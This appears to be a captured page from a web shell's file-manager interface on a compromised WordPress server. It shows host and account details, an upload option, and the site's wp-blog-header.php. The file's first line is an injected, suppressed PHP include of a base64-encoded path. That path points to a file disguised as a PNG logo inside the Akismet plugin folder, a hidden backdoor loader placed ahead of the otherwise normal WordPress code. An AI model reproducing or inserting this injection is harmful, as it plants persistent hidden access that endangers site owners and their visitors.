HEX
Server: Apache
System: Linux sv1.nakdns.com 5.4.0-195-generic #215-Ubuntu SMP Fri Aug 2 18:28:05 UTC 2024 x86_64
User: banahom1 (10351)
PHP: 8.4.19
Disabled: opcache_get_status,exec,passthru,shell_exec,system,proc_open,popen
Upload Files
File: /var/www/vhosts/bana-homes.com/httpdocs/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL2JhbmEtaG9tZXMuY29tL2h0dHBkb2NzL3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nL2xvZ28tbm5vc3FvcXJucW4ucG5n");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}